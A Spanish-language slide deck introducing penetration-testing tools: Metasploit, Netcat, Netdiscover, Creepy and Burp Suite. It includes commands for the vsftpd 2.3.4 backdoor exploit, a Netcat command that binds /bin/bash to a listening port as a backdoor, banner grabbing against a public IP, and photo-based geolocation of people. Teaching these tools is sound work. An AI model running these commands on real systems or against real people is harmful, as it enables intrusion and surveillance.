Documenti di Didattica
Documenti di Professioni
Documenti di Cultura
Jose G. Rodriguez
Agenda
Metasploit Scapy Ncat Netdiscover Creepy Burp Suite
Metasploit
Cuando de seguridad se trata, la revelacin pblica de vulnerabilidades y del cdigo de explotacin que funciona son hoy en da una cosa habitual. Vemos por qu esto puede ser tanto perjudicial como til para asegurar nuestros sistemas.
Metasploit
Empezamos primero subiendo los servicios: service postgresql start service metasploit start Luego: msfconsole
Metasploit
msf> use <el exploit necesario> msf> use exploit/unix/ftp/vsftpd_234_backdoor Msf> show options Msf > set <parmetro> <valor> msf> exploit
Netcat
Conocido como el Swiss Army knife of hacking tools. Netcat es usado para Banner Grab del OS Fingerprinting ej: Netcat 200.42.213.11 80
Netcat
Para escuchar conecciones netcat -l -p 6996 Crear backdoors nc -l -p 6996 -e /bin/bash
Netdiscover
Herramienta activa/pasiva para reconocer redes sin DHCP, cuando se esta haciendo wardriving. netdiscover -i wlan0 (Auto Discover redes) netdiscover -i wlan0 -r 10.0.0.0/8
Creepy
Es una herramienta de geolocalizacin de fotos, accesible desde la API del servicio de alojamiento de imgenes y a las etiquetas EXIF de las fotos publicadas, eso tambin incluye servicios de alojamientos de imgenes como Flickr, Yfrog o Twitpic
Creepy
Burp Suite
Una herramienta de intrusin, para realizar poderosos ataques personalizados de encontrar y explotar vulnerabilidades inusuales.
http://www.kontrol0.com/2013/06/f uerza-bruta-con-burpsuit.html